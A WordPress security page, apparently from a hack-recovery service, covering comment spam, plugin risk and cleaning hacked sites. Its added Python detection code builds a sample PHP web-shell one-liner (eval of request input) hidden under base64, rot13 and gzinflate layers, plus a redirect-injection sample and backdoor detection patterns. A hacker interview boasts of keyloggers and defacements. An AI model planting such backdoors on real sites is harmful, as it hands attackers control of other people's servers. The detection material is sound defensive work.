Is my premium plugin safe?

A brief explanation of premium plugins

Premium plugins require a one-time or annual payment. Given the cost, one might expect them to be more secure.

However, that depends entirely on the mindset of the plugin's developer. Some invest significant effort in securing the plugin; others focus solely on features to maximise profit.

A premium plugin is therefore not necessarily safer than a free one.

One disadvantage of premium plugins is that attackers spend more time looking for vulnerabilities in them. They know that websites running paid plugins are often business sites or other sites their owners have invested in.

The attacker's goal is usually not to take the website down but to use the domain to send spam or place advertisements (link building and traffic).

Important tips when using premium plugins

  • Buy them legally; "nulled" copies offered for free often come with backdoors built in.
  • Update the plugin to the latest version regularly.
  • Check whether the licence and update entitlement expire after one year; if they do, you lose access to security updates unless you renew.

Delete comment spam in WordPress

What is comment spam?

Comment spam is the term for unwanted comments on your blog. Such comments are usually unrelated to the topic and often contain links to products on other websites.

Delete all comment spam at once

All comments are stored in the database, and this plugin empties the entire comments table with a single click.

Note: You will lose ALL comments at once.

Selectively remove spam comments without plugins

You can change how many comments the admin panel shows per page. Click "Screen Options" in the Comments section of your WordPress admin and set the number of items to 50 or 100.


Then you can select all comments on the page at once and deselect the ones you want to keep. Whether that is quicker than selecting the spam one by one depends on the ratio of spam to comments worth keeping.


Prevent comment spam via WordPress settings

WordPress has a Discussion settings page where you can raise the bar for posting comments. For example, you can hold any comment containing more than one link for moderation (WordPress puts such comments in the moderation queue; it does not mark them as spam by itself), or require users to be registered and logged in before commenting.


Plugins to stop comment spam

Several plugins help prevent comment spam, such as Akismet, which ships with every WordPress installation (it still has to be activated and given an API key before it filters anything).

iThemes Security PRO NL also has an effective feature against comment spam: the PRO version offers a reCAPTCHA option that adds a captcha requirement to the comment form.

You can also enable reCAPTCHA for new registrations and the login form.

Important!

Never click a link in a comment while you are logged in!

As an administrator you have the rights to change things in WordPress, and attackers know that. A link in a comment can lead to a page whose JavaScript fires requests at your own site in the background, and because your browser sends your logged-in session cookie with those requests, the actions run with your rights (a cross-site request forgery). WordPress protects its own admin actions with nonces for exactly this reason, but links in comments should still be treated as untrusted, especially from an admin session.
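As an added example (not code from the original page, and not WordPress's own implementation), here is the mechanism behind that warning: a state-changing admin action that checks only the session cookie, next to the same action protected by a per-user, per-action nonce of the kind WordPress uses. The nonce construction mirrors the shape of wp_create_nonce() (HMAC over time-tick|action|user|session, with the previous tick still accepted), but the secret, the tick length, the hash and the Admin class are assumptions made for this demonstration.

```python
import hashlib
import hmac
import time
from typing import Optional

# Assumptions for this demo: SECRET stands in for the site's NONCE_SALT, and one tick
# is 12 hours (a nonce is valid for the current and the previous tick, i.e. 12-24 h).
SECRET = b"constructed-demo-secret-do-not-reuse"
TICK_SECONDS = 12 * 3600


def _tick(now: float) -> int:
    # Coarse time bucket, so the nonce rotates without embedding a timestamp.
    return int(now // TICK_SECONDS)


def _digest(tick: int, action: str, user_id: int, session: str) -> str:
    msg = f"{tick}|{action}|{user_id}|{session}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[-12:-2]


def create_nonce(action: str, user_id: int, session: str, now: Optional[float] = None) -> str:
    """Token embedded in a page rendered for this user, this session and this action only."""
    now = time.time() if now is None else now
    return _digest(_tick(now), action, user_id, session)


def verify_nonce(nonce: str, action: str, user_id: int, session: str, now: Optional[float] = None) -> bool:
    now = time.time() if now is None else now
    for tick in (_tick(now), _tick(now) - 1):  # current and previous tick are both accepted
        if hmac.compare_digest(_digest(tick, action, user_id, session), nonce):
            return True
    return False


class Admin:
    """Toy admin backend with one state-changing action: delete a post."""

    def __init__(self) -> None:
        self.posts = {1: "Hello world", 2: "About us"}

    def delete_post_vulnerable(self, request: dict) -> bool:
        # Only checks that the session cookie belongs to an admin. The browser attaches
        # that cookie to every request to the site, so a link, <img src=...> or script on
        # any page the admin opens can fire this request without the admin doing more.
        if request.get("cookie_user") != "admin":
            return False
        self.posts.pop(int(request["post"]), None)
        return True

    def delete_post_hardened(self, request: dict) -> bool:
        if request.get("cookie_user") != "admin":
            return False
        # The request must also carry a nonce bound to this user (assumed to be user 1),
        # this session and this action. A page on another site cannot compute it without
        # the server secret, so the forged request is refused although the cookie is valid.
        action = "delete-post_" + str(request["post"])
        if not verify_nonce(request.get("_wpnonce", ""), action, 1, request.get("session", "")):
            return False
        self.posts.pop(int(request["post"]), None)
        return True


def demo() -> dict:
    """Replay the same forged request against both handlers and report what each did."""
    session = "sess-abc"  # constructed session identifier
    forged = {"cookie_user": "admin", "session": session, "post": "2"}  # what a malicious link sends
    legit = dict(forged, _wpnonce=create_nonce("delete-post_2", 1, session))  # from a real admin page

    vulnerable, hardened = Admin(), Admin()
    return {
        "forged_vulnerable": vulnerable.delete_post_vulnerable(dict(forged)),  # True: post 2 is gone
        "forged_hardened": hardened.delete_post_hardened(dict(forged)),       # False: rejected
        "legit_hardened": hardened.delete_post_hardened(legit),               # True: the real form works
        "posts_left_vulnerable": sorted(vulnerable.posts),
        "posts_left_hardened": sorted(hardened.posts),
    }
```

The nonce is tied to the user and session as well as the action, so a token leaked from one admin's page is useless for another account, and the two-tick window keeps a form that was opened just before a tick boundary working without making tokens long-lived.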

Solving comment spam, contact spam via phpMyAdmin

Another very effective way to remove spam is through phpMyAdmin, where you can be selective by comment status.

First, make a backup of your database!!

Delete all approved comments:
 DELETE FROM wp_comments WHERE comment_approved = '1';
Delete all pending comments:
 DELETE FROM wp_comments WHERE comment_approved = '0';
Delete all comments marked as spam:
 DELETE FROM wp_comments WHERE comment_approved = 'spam';
Delete all comments in the trash:
 DELETE FROM wp_comments WHERE comment_approved = 'trash';

wp_ is the default table prefix; if you chose another prefix during installation, use that instead. Note that these statements only remove rows from the comments table: any metadata belonging to the deleted comments stays behind in the commentmeta table until you remove it too.

If you need help with spam problems, whether preventive or because your own website is sending spam, contact us.
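As an added example, not the page's own SQL: the phpMyAdmin clean-up above, done the way a practitioner would do it: count first, delete inside one transaction, and also remove the comment metadata that the statements above leave behind in wp_commentmeta. It runs against an in-memory SQLite copy of the two tables with constructed rows so it can be tried offline; the statements themselves are plain SQL that works unchanged in MySQL/phpMyAdmin. The wp_ prefix, the reduced set of columns and the function names are assumptions for this demonstration.

```python
import sqlite3

PREFIX = "wp_"  # assumption: the default table prefix; use your own if you changed it at install time
STATUSES = {"approved": "1", "pending": "0", "spam": "spam", "trash": "trash"}

# Minimal copies of the two tables involved (only the columns the clean-up touches).
SCHEMA = f"""
CREATE TABLE {PREFIX}comments (
    comment_ID       INTEGER PRIMARY KEY,
    comment_approved TEXT NOT NULL,
    comment_content  TEXT
);
CREATE TABLE {PREFIX}commentmeta (
    meta_id    INTEGER PRIMARY KEY,
    comment_id INTEGER NOT NULL,
    meta_key   TEXT,
    meta_value TEXT
);
"""

# Constructed sample rows: one real comment, two spam, one pending, one trashed.
SAMPLE_COMMENTS = [
    (1, "1", "Nice article, thanks"),
    (2, "spam", "cheap pills http://example.invalid/"),
    (3, "spam", "buy followers http://example.invalid/"),
    (4, "0", "Is this plugin still maintained?"),
    (5, "trash", "old comment the author removed"),
]
SAMPLE_META = [
    (1, 2, "akismet_result", "true"),
    (2, 3, "akismet_result", "true"),
    (3, 1, "akismet_result", "false"),
]


def open_sample_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(f"INSERT INTO {PREFIX}comments VALUES (?, ?, ?)", SAMPLE_COMMENTS)
    conn.executemany(f"INSERT INTO {PREFIX}commentmeta VALUES (?, ?, ?, ?)", SAMPLE_META)
    conn.commit()
    return conn


def count_by_status(conn: sqlite3.Connection, status: str) -> int:
    """How many rows a purge of this status would remove; run this before deleting anything."""
    row = conn.execute(f"SELECT COUNT(*) FROM {PREFIX}comments WHERE comment_approved = ?",
                       (STATUSES[status],)).fetchone()
    return row[0]


def orphaned_meta_count(conn: sqlite3.Connection) -> int:
    """Metadata rows whose comment no longer exists (what the bare DELETEs leave behind)."""
    row = conn.execute(f"SELECT COUNT(*) FROM {PREFIX}commentmeta "
                       f"WHERE comment_id NOT IN (SELECT comment_ID FROM {PREFIX}comments)").fetchone()
    return row[0]


def purge_comments(conn: sqlite3.Connection, status: str, dry_run: bool = False) -> tuple:
    """Delete every comment with the given status plus its metadata.

    Returns (comments_removed, meta_rows_removed). With dry_run=True nothing is
    deleted and the counts show what would go. Both DELETEs run in one transaction,
    so a failure leaves the tables untouched instead of half-cleaned.
    """
    if status not in STATUSES:
        raise ValueError(f"unknown status {status!r}; choose one of {sorted(STATUSES)}")
    n_comments = count_by_status(conn, status)
    if dry_run:
        return n_comments, 0
    with conn:  # sqlite3 connection as context manager: commit on success, rollback on error
        conn.execute(f"DELETE FROM {PREFIX}comments WHERE comment_approved = ?", (STATUSES[status],))
        # The page's statements stop at the line above; this removes the metadata of the
        # comments that no longer exist.
        cur = conn.execute(f"DELETE FROM {PREFIX}commentmeta "
                           f"WHERE comment_id NOT IN (SELECT comment_ID FROM {PREFIX}comments)")
        n_meta = cur.rowcount
    return n_comments, n_meta


if __name__ == "__main__":
    db = open_sample_db()
    print("would remove:", purge_comments(db, "spam", dry_run=True))
    print("removed:", purge_comments(db, "spam"))
```

Against a live site, run the dry run first and compare the count with what the Comments screen shows for that status; a number that is far off usually means the wrong prefix or the wrong database.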

Interview with a hacker, “hacking for fun”

This is an interview with a hacker who has been hacking websites and applications for several years. The hacker wishes to remain anonymous, so we will not mention a name.

How did you start hacking?

It all began years ago when I was 16. I read about taking over someone’s Windows PC to play pranks like opening and closing the CD-ROM drive remotely. Then I learned about shutting down the PC, which also seemed fun. But it quickly became boring as I couldn’t see the person’s reaction. Also, back then, there weren’t as many laptops, and most of them didn’t have webcams, which I would have liked to see at that moment.

That sounds relatively harmless, but I understand you have been involved in other activities in recent years.

Yes, the feeling of having power over someone or “breaking in” was quite addictive. Eventually, I started sending keyloggers via email, allowing me to receive weekly emails with everything they typed. But even that became dull, as there wasn’t much interesting stuff to read.

And then you started hacking websites?

Well, not directly, as it was quite challenging to learn, and everything online changed so fast. It actually started with an acquaintance who had a website. Just for fun, I tried some login credentials, and he used his own name as the user and password, which he used everywhere, even for games, etc.

So, just for fun, I changed a few words on the website.

With someone you knew personally?

Yes, just for fun, harmless… I only changed a few words, giving the information a different twist.

How did you progress to the point where you started seriously intruding into other people’s websites, I assume strangers?

Well, intrusion… I’d say they left the backdoor of their website wide open, and I just walked in. And they weren’t strangers because the first websites I started hacking belonged to people I didn’t really like. My former employer and a few individuals who deserved it. I mean, it’s still quite decent, right? I didn’t physically harm them but just took them down a peg.

I only modified their websites. I deleted all the pages and uploaded my own page with a nice picture.

It’s really that simple once you’re inside the server.

Aren’t you afraid they might catch on or report you to the authorities?

They have to find me first. I have a way to be “invisible” on the internet without leaving my IP address, etc.

Are you still very active? Should I think about one website per week, per month, or…?

No, not at all. Occasionally, when I have free time, I turn on some hacking software and try to get into a website. Sometimes, I even email them. I politely tell them they have a vulnerability and how to fix it. But most of the time, I don’t get paid for it, even though I provide my Bitcoin address. Not even a tip for the effort, so it’s more fun to hack a well-known or popular website and mess around with it.

Thank you for the interview.

You’re welcome. It’s also nice to share sometimes. Most of what happens on the internet is anonymous because I prefer to keep everything private from acquaintances. They usually wouldn’t understand anyway.

Knowledge and experience takes years

I often encounter programmers whose own website, or a client's site, has been hacked and who then Google how to remove that hack. They add what they find to their programming knowledge and try to restore and secure the site with it.

However, no matter how much they read and apply from the internet, the hacks keep coming back.

Which makes me think: knowledge and experience take years to build.

And I experienced this…

When I was young, I had a vintage bike, a moped with a manual gearbox. It didn't run properly and couldn't reach the speed it should. I researched extensively on the internet and worked on it a lot, but nothing seemed to solve the problem.

During one of the test rides, a hunched old man in his eighties shouted: "Your mixture is too rich, you're burning too much oil."

I said: "No, it's fine, I know what's in the tank!"

The old man said: "I can hear that it's running too rich. You should put less oil in your fuel."

Later it turned out that the wrong mixture had been put in the tank, one not suitable for that specific type of moped. (The moped still had a separate oil reservoir that needed only a small amount of oil, which allowed it to run on a different fuel.)

Various people around me (including the moped's previous owner) couldn't figure it out, but this man heard it from the sound of the engine!

That is knowledge and experience!

Why JUST QUICKLY REMOVING A HACK is not realistic

I hear it at least once a month: "just have a quick look on the server to see if you find anything, and delete IT."

This is even a commonly used strategy among web builders: they browse through the server, delete a thing or two and then assume the hack is gone.

Is it strange to think a hack consists of 1, 2 or 3 files?

Thinking a hack consists of a few files is not that odd. I understand the idea!

Unfortunately, malicious hackers put a lot of effort into their exploit, hack script or piece of malware.
Their hack script often contains a line of code that points at the root directory and drops malware into every subdirectory below it.

An extra copy of the script costs them nothing, after all!
And the server keeps working...

Hacks above public_html?

Yes, it happened to me too, before I started working from a checklist. I cleaned the website ten times over, spotless, everything IN public_html or httpdocs.
But those rats also put their malware above public_html if that directory is writable.

Oh, those few folders in a WordPress website... right?

You may be surprised: a standard WordPress installation, before plugins and themes are even added, already contains more than 3000 files and 307 folders!!

Where? Well, count along. The root folder WordPress lives in already starts with 3 folders:
wp-admin + wp-content + wp-includes
> wp-content > plugins / themes / upgrade / languages
> uploads / years / months /

12 folders per year; keep that up for 6 years... 72 folders! In the uploads folder alone.

A GIANT hiding place, in other words. And it takes only one folder with an active piece of code for hackers to keep walking straight back in. The so-called backdoor.

Backdoors – small, deceptive, but a BIG danger!

Translated literally: back doors.
They create new WordPress administrators and pass important data on to hackers. They literally make anything possible!
And such a backdoor only needs to be 5 lines of code in a small file... or, built with base64, a single line of code. (Example code below, part of a backdoor.)

In the most brazen backdoors we even find Telegram bots that forward new customer details, purchases and admin accounts straight to the attacker. Dreadful!

Hacker trick: fake folder names

Don't be surprised if you come across folders that don't belong there but look perfectly legitimate.
Made-up folders that closely resemble legitimate ones, and that also appear to be empty or filled with the "right" files..
> root
> index
> uplaods / 2023
> wp-apmin


Those need a careful look. Moving the mouse along all the folders and deleting "something" doesn't work.

101 other tricks

There are so many tricks, and I see new ones go by every week. Backdoors, phishing, spamming, data theft...
Hopefully you now understand that "just walking through the files and deleting whatever you come across" is not an option.
At least, not a good one!
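The hiding places described above can be checked mechanically instead of by eye. As an added example, not code from the original page: a script that walks a WordPress web root and reports entries that are not part of a stock install, look-alike names such as wp-apmin or uplaods, PHP files inside wp-content/uploads (which should hold media only), and PHP files in the directory above the web root. The allowlists, the similarity threshold and the sample tree it builds in a temporary directory are assumptions for this demonstration; a real site's legitimate additions (mu-plugins, cache directories, a custom uploads location) must be added to the allowlists first, or they will be reported for review.

```python
import os
import tempfile
from difflib import SequenceMatcher

# Entries a stock WordPress install has at the web root and in wp-content (assumption:
# an allowlist for this demo). Anything else is reported so a human looks at it.
STOCK_ROOT = {
    "wp-admin", "wp-content", "wp-includes", "index.php", "wp-config.php",
    "wp-config-sample.php", "wp-login.php", "wp-settings.php", "wp-load.php",
    "wp-blog-header.php", "wp-cron.php", "xmlrpc.php", "wp-activate.php",
    "wp-comments-post.php", "wp-links-opml.php", "wp-mail.php", "wp-signup.php",
    "wp-trackback.php", "license.txt", "readme.html", ".htaccess",
}
STOCK_WP_CONTENT = {"plugins", "themes", "upgrade", "languages", "uploads", "index.php"}
PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".phar")
LOOKALIKE_RATIO = 0.8  # assumption: similarity above which an unknown name "imitates" a stock one


def _lookalike(name, known):
    best = max(known, key=lambda k: SequenceMatcher(None, name.lower(), k).ratio())
    return best if SequenceMatcher(None, name.lower(), best).ratio() >= LOOKALIKE_RATIO else None


def _check_dir(root, rel, known, findings):
    # Flag every entry that is not on the allowlist; say which real name it imitates, if any.
    for entry in sorted(os.listdir(os.path.join(root, rel))):
        if entry in known:
            continue
        look = _lookalike(entry, known)
        findings.append(("lookalike:" + look if look else "unexpected", os.path.join(rel, entry)))


def scan_wordpress_tree(root):
    """Return sorted (finding, relative path) pairs for a WordPress web root."""
    findings = []
    _check_dir(root, "", STOCK_ROOT, findings)
    if os.path.isdir(os.path.join(root, "wp-content")):
        _check_dir(root, "wp-content", STOCK_WP_CONTENT, findings)
    # uploads/ holds media only; any PHP there is a dropped script, never a WordPress file.
    for dirpath, _, files in os.walk(os.path.join(root, "wp-content", "uploads")):
        for f in files:
            if f.lower().endswith(PHP_EXT):
                findings.append(("php-in-uploads", os.path.relpath(os.path.join(dirpath, f), root)))
    # The directory above the web root (above public_html) is writable on many hosts and
    # is cleaned far less often; PHP files there deserve the same scrutiny.
    parent = os.path.dirname(os.path.abspath(root))
    for entry in sorted(os.listdir(parent)):
        if os.path.isfile(os.path.join(parent, entry)) and entry.lower().endswith(PHP_EXT):
            findings.append(("php-above-webroot", os.path.join("..", entry)))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a stock-looking site with the four hiding places planted in it."""
    root = os.path.join(tempfile.mkdtemp(), "public_html")
    for d in ("wp-admin", "wp-includes", "wp-content/plugins", "wp-content/themes",
              "wp-content/uploads/2023/05", "wp-content/uplaods/2023", "wp-apmin"):
        os.makedirs(os.path.join(root, d))
    for f in ("index.php", "wp-config.php", "wp-content/index.php",
              "wp-content/uploads/2023/05/photo.jpg",
              "wp-content/uploads/2023/05/shell.php",   # script dropped among the media
              "wp-content/uplaods/2023/index.php",      # look-alike dir holding a "normal" file
              "wp-apmin/admin.php",                     # look-alike of wp-admin
              "../wp-cache.php"):                       # planted above the web root
        path = os.path.normpath(os.path.join(root, f))
        with open(path, "w") as fh:
            fh.write("<?php // constructed sample file\n" if path.endswith(".php") else "")
    return root


if __name__ == "__main__":
    for finding, path in scan_wordpress_tree(build_sample_tree()):
        print(f"{finding:22} {path}")
```

The scan reports only names and locations; it does not decide that a file is malicious, and it deliberately does not delete anything. A name that imitates a stock one is the strongest signal here, because there is no legitimate reason for a wp-apmin directory to exist.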

Have your website made hack-free

Do you have a WordPress website, small, large, business or webshop, that you want made COMPLETELY hack-free?
You can! That is what we do.

Register your website for hack recovery

WordPress security – The pyramid

WordPress Security is like a Pyramid


The Base is WordPress
At the top of the pyramid, it all begins with the programmer/designer who sets up your WordPress website.

Securing Just One Part is Useless!

Focusing on a single aspect, such as a good programmer/designer, secure passwords or the latest updates, is not enough. As the pyramid shows, it is only one part of the whole.

A Truly Secure WordPress Website

To achieve a genuinely secure WordPress website, you need to secure all aspects.

We will help you, step by step, to make each part of the pyramid secure so that your WordPress website is truly protected!

  • The Programmer/Designer
  • The Theme
  • The Plugins
  • The Hosting
  • The User
  • WordPress Itself

The Programmer/Designer

A good WordPress developer will use no more than 8-10 plugins. Each additional plugin is an opportunity for attackers, because not every plugin developer is a security expert.

This is where knowledge comes in: the programmer/designer needs to be aware of the risk each extra plugin adds and should consider coding certain features instead of installing a plugin for them.

Bear in mind that building functions without plugins takes longer, so the budget may need to go up. You cannot expect a developer to build a fully functional website for a small amount (150-300) and also deliver top-notch security. (Nor is every developer who charges a lot of money necessarily good!!)

The Theme

Whether it’s premium or free, it doesn’t matter.

Really?

Premium themes are targeted more often because attackers prefer sites that involve money, and premium themes and plugins are common on exactly those sites; attackers know that.

In short, being premium is no guarantee. Do some research to see whether the theme appears in this database.

The Plugins

As the pyramid shows, plugins play a significant role in the website's security: more than 36.3% of it depends on them.
Plugins are "third-party made", which means they are developed by an individual in a basement or by a team that launches a plugin.

Do you know who made your plugin? And do they have expertise in security?

There are 44,273 plugins available for free download on WordPress.org.

This is a fantastic offering! Plugins such as:

These are excellent plugins that can transform WordPress into an online shop or marketing machine!

However, once a plugin gains popularity, attackers download it and search it for vulnerabilities. Once one is found, they write a script that scans websites for the targeted plugin and then runs a payload that fills your website with ads for the attacker's products. Often these are Viagra-related, as it apparently sells well.

The Hosting

Hosting is where your website lives. This is known as a "data center".

Sounds cool, and it is: high-tech computers are running to serve your website.

Well, high-tech... they are actually expensive stripped-down computers.
Powerful processors and ample storage ensure that websites are served quickly when a visitor requests them.

What is the host’s responsibility?

The host must keep the server software up to date. Websites are served by a computer running Linux or Windows, and that machine itself should not get infected/hacked. That rarely happens, which is why this accounts for only 9.09% of the pyramid.

What does a good host do?

A good host wants to keep its high-tech computers fast, which means making sure visitors are being served while hacker scripts are not running. Sometimes a hosting company will ask you to keep all WordPress plugins up to date.

Or it may even take your WordPress website offline!

If your website is busy sending spam or attacking other servers/computers of the host, they may take it offline to stop the disruptive behaviour.

The User


What You, as a User, Can Do

  • Keep your plugins, theme, and WordPress up to date
  • Choose passwords that are not easy to guess
  • Don’t leave unnecessary plugins or themes on the server
  • Avoid clicking on links while logged in as the website’s administrator

WordPress Itself

The developers behind WordPress, who continue to offer it for free, are very active. They release new WordPress updates monthly, and sometimes more often, to address new attacker tricks.

WordPress itself is a good and stable system! It was launched in May 2003 and has been in development for over 10 years.

Did You Know?

There is a Dutch security plugin that takes care of 80% of these aspects for you!

iThemes Security PRO NL

This plugin helps you set up the server/hosting, enforces strong passwords, keeps hackers out, secures directories, stops brute-force attacks, secures your admin area, and gives you an overview of and control over your website!


My WordPress website shows another website!?!!

If your WordPress website suddenly redirects to another website, it may mean your website has been hacked. Attackers can use scripts to modify your website and redirect visitors to their own site, which can lead to unwanted advertising or other harmful activity. It is essential to act quickly as soon as you notice this.

The hacker's website

The hacker's website is usually there to make money: selling products or running other fraudulent schemes for profit. It is important to stop your website from being used as a platform for the hacker's activities.

Keep these hackers out of your website

It is crucial to make sure hackers cannot get into your website. Although WordPress itself is generally secure, vulnerabilities in plugins can give hackers an opening, so securing your website properly matters.

Protect your WordPress website

Using a reliable security plugin is one of the best ways to protect your WordPress website against hackers. An antivirus and security plugin such as iThemes Security PRO can help secure your website with features such as hiding the admin area, blocking repeated login attempts, managing secure passwords and backing up your database.

Some features of iThemes Security PRO:

– Hiding the admin area of your website, making it harder for hackers to reach it.
– Protecting vulnerable files on the server so hackers cannot access them.
– Blocking repeated login attempts to prevent brute-force attacks.
– Enforcing strong passwords to improve security.
– Backing up your database so you can restore your website if something goes wrong.
– Tracking file changes so you can spot suspicious activity.
– Notifying you of changes to your website so you can respond quickly to suspicious activity.

Check your security settings regularly and keep your WordPress website up to date for the best protection against hackers. With the right security measures you considerably reduce the chance of a hacked website and safeguard your visitors and their data.

Hacked content detected, now what?

If you receive a message from Google saying that hacked content has been detected on your WordPress site, that is indeed very annoying. Here are answers to the questions you may have:

How did the website suddenly get hacked?

One of the most common causes of a hacked website is a vulnerable plugin or theme. In roughly 15% of cases WordPress itself is the culprit, but usually only when WordPress has not been updated for 1-3 years. Attackers examine plugins for vulnerabilities that let them break into WordPress websites. Once they find a hole, they release a script that searches the internet for every website running that specific plugin and then performs their injection. The injection is often malicious code that advertises through your website, which Google typically classifies as unwanted advertising or phishing.

What can I do to restore the website after hacked content has been detected?

The easiest and most reliable way to restore and secure your website is to hire a specialised company such as WPbeveiligen. They have experience restoring and securing WordPress websites and can make your site safe again. When you engage WPbeveiligen you usually also get guarantees on the recovery process, which gives extra peace of mind.

If you want to restore your WordPress website yourself, these are the basic steps:

1. Use Sucuri's free scanner to find out which pages are serving malicious content. Note that a remote scanner only sees what your site sends to visitors; it cannot list the infected files on the server, so you still have to go through the file system and the database yourself.
2. Make a full backup of your website, including all files and the database.
3. Remove the hacked files and malicious code. Note that this code is usually encoded (base64 and similar) to avoid detection, so a search for obvious keywords is not enough.
4. Update all plugins, WordPress itself and, where possible, the theme to the latest versions.
5. Secure your WordPress website with a good antivirus plugin made specifically for WordPress.

Bear in mind that restoring a hacked website can be a complex process and may require more steps than described above. It is always wise to call in an expert if you are not sure what you are doing.
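Step 3 above and the "my website shows another website" article earlier on this page both come down to recognising code that does not belong. As an added example, not code from the original page: a check over file contents that flags eval() of an encoded string, unwraps the base64/str_rot13/gzinflate layers in the order PHP applies them so you can see what the payload really does, flags a decoded payload that executes request input (the classic backdoor), and flags an injected script that redirects the visitor. The sample file contents, the indicator list and the function names are constructed for this demonstration and are not a complete signature set.

```python
import base64
import codecs
import re
import zlib

# Indicators (an assumption: a small illustrative set, not a complete signature list).
OBFUSCATION = re.compile(
    r"\b(?:eval|assert|create_function)\s*\(\s*(?:\w+\s*\(\s*)*"
    r"(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
WRAPPER = re.compile(r"(gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
REDIRECT = re.compile(
    r"<script[^>]*>[^<]*?(?:window|document|top|self)\.location(?:\.href|\.replace)?\s*[=(]",
    re.I | re.S)
EXEC_OF_INPUT = re.compile(
    r"\$_(?:REQUEST|POST|GET|COOKIE)\b.*\b(?:eval|assert|system|exec|passthru|shell_exec)\b"
    r"|\b(?:eval|assert|system|exec|passthru|shell_exec)\b.*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.S)


def decode_chain(text):
    """Undo eval(<wrappers>(base64_decode('...'))) in the order PHP would apply them."""
    m = B64_LITERAL.search(text)
    if not m:
        return None
    data = base64.b64decode(re.sub(r"\s", "", m.group(1)))
    # Wrappers between the start of this statement and the literal, e.g. gzinflate(str_rot13(
    stmt = text[:m.start()].rsplit(";", 1)[-1]
    for w in reversed(WRAPPER.findall(stmt)):  # innermost (rightmost) wrapper runs first
        w = w.lower()
        if w == "gzinflate":
            data = zlib.decompress(data, -15)       # raw DEFLATE, like PHP gzinflate()
        elif w == "gzuncompress":
            data = zlib.decompress(data)            # zlib-wrapped, like PHP gzuncompress()
        elif w == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
    return data.decode("utf-8", "replace")


def inspect(text):
    """Indicators found in one file's contents, plus the decoded payload if there is one."""
    indicators, decoded = [], None
    if OBFUSCATION.search(text):
        indicators.append("eval-of-encoded-string")
        decoded = decode_chain(text)
        if decoded and EXEC_OF_INPUT.search(decoded):
            indicators.append("backdoor-executes-request-input")
    if REDIRECT.search(text):
        indicators.append("script-redirect")
    return {"indicators": indicators, "decoded": decoded}


# Constructed samples. BACKDOOR is the classic one-liner: run whatever the request carries.
BACKDOOR = b"if(isset($_REQUEST['p'])){eval($_REQUEST['p']);}"


def _raw_deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def _layered(payload):
    # What an attacker stores for eval(gzinflate(str_rot13(base64_decode('...')))):
    rot = codecs.encode(_raw_deflate(payload).decode("latin-1"), "rot_13").encode("latin-1")
    return base64.b64encode(rot).decode()


SAMPLES = {  # constructed file contents, keyed by a plausible path
    "wp-content/themes/child/functions.php":
        "<?php\nadd_action('init', 'child_setup');\n"
        "eval(base64_decode('" + base64.b64encode(BACKDOOR).decode() + "'));\n",
    "wp-content/uploads/2019/03/cache.php":
        "<?php\neval(gzinflate(str_rot13(base64_decode('" + _layered(BACKDOOR) + "'))));\n",
    "wp-content/themes/child/header.php":
        '<!DOCTYPE html><html><head>\n<script>window.location.href="http://example.invalid/promo";</script>\n',
    "wp-content/plugins/some-plugin/some-plugin.php":
        "<?php\n/* constructed clean plugin */\nfunction some_plugin_init() { return true; }\n",
}


def scan_samples():
    return {path: inspect(text) for path, text in SAMPLES.items()}


if __name__ == "__main__":
    for path, result in scan_samples().items():
        print(path, result["indicators"], (result["decoded"] or "")[:60])
```

Decoding the payload rather than just deleting the line matters: the decoded text tells you whether it was a backdoor that accepted commands (in which case the attacker may already have created admin users or dropped further files) or merely an injected advertisement.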

How do I prevent Google's notice that hacked content has been detected?

To prevent Google from detecting hacked content on your website, take the following measures:

1. Use a good antivirus plugin made specifically for WordPress to detect and block potential threats.
2. Remove unused plugins and themes from your server.
3. Keep the number of installed plugins to a minimum and keep them up to date.
4. Regular updates of WordPress, plugins and themes are essential. Always make a backup before updating.
5. Check that your hosting provider has proper security measures in place to stop attacks and to isolate websites from each other. This matters most in shared hosting environments.

By being proactive and following good security practices, you considerably reduce the chance of a hacked website.

WordPress install

Installing WordPress requires a hosting package with at least 1000 MB of disk space for WordPress and future content such as text and images. The package must also include a database, which most hosting plans provide by default. When you order a hosting package you receive an email containing:

1. FTP (File Transfer Protocol) details: these credentials give you access to the server where you place WordPress in step 2. They usually consist of a hostname (e.g. ftp.example.com), a username (e.g. example_user) and a password (e.g. &Y#HLlk214h). You use them in an FTP program such as FileZilla to upload WordPress to the server. Prefer SFTP or FTPS if your host offers it: plain FTP sends the password and all files unencrypted.

2. MySQL database details: these credentials are used during the WordPress installation in step 3. They typically consist of the database name (e.g. example_dbname), the database username (e.g. example_uname) and a password (e.g. &Y#HLlk214h).

Once you have a hosting package, proceed with the following steps:

Step 1. Download WordPress: download it for free from WordPress.org and extract the archive with a ZIP program or WinRAR.

Step 2. Place WordPress on the server: connect to the server with the FTP credentials in an FTP program such as FileZilla. Navigate to the "www" or "httpdocs" folder (often called the root of your site) and upload the files you extracted in step 1.

Step 3. Link WordPress to the database: open your domain in a web browser to start the WordPress installer. You will be asked for the MySQL details: database name, database username and password. The database host is usually "localhost", but the email with your hosting details may specify another address. For added security, change the table prefix from the default wp_ during installation.

Step 4. Done! After installation you reach the WordPress admin panel at www.your-website-address.nl/wp-admin. Log in with the username and password you chose during installation to manage your WordPress website.

Note that although WordPress is a robust system, its popularity and free availability make it a target for attackers. To improve security, consider a reliable WordPress security plugin, which can close over 100 known vulnerabilities and make it harder for attackers to exploit your website.

Statistics on website security

With well over a billion websites, the internet is a massive market for both visitors and attackers. Cybercriminals know that infecting even a small percentage of those websites with their own advertisements yields significant results. WordPress, Joomla and Magento, as popular content management systems, are particularly attractive targets, since roughly one third of all websites run on these platforms.

Sucuri's report indicates a significant increase in cybercrime in recent years. How successful attackers are at hacking websites en masse, however, depends largely on how those websites are managed and secured.

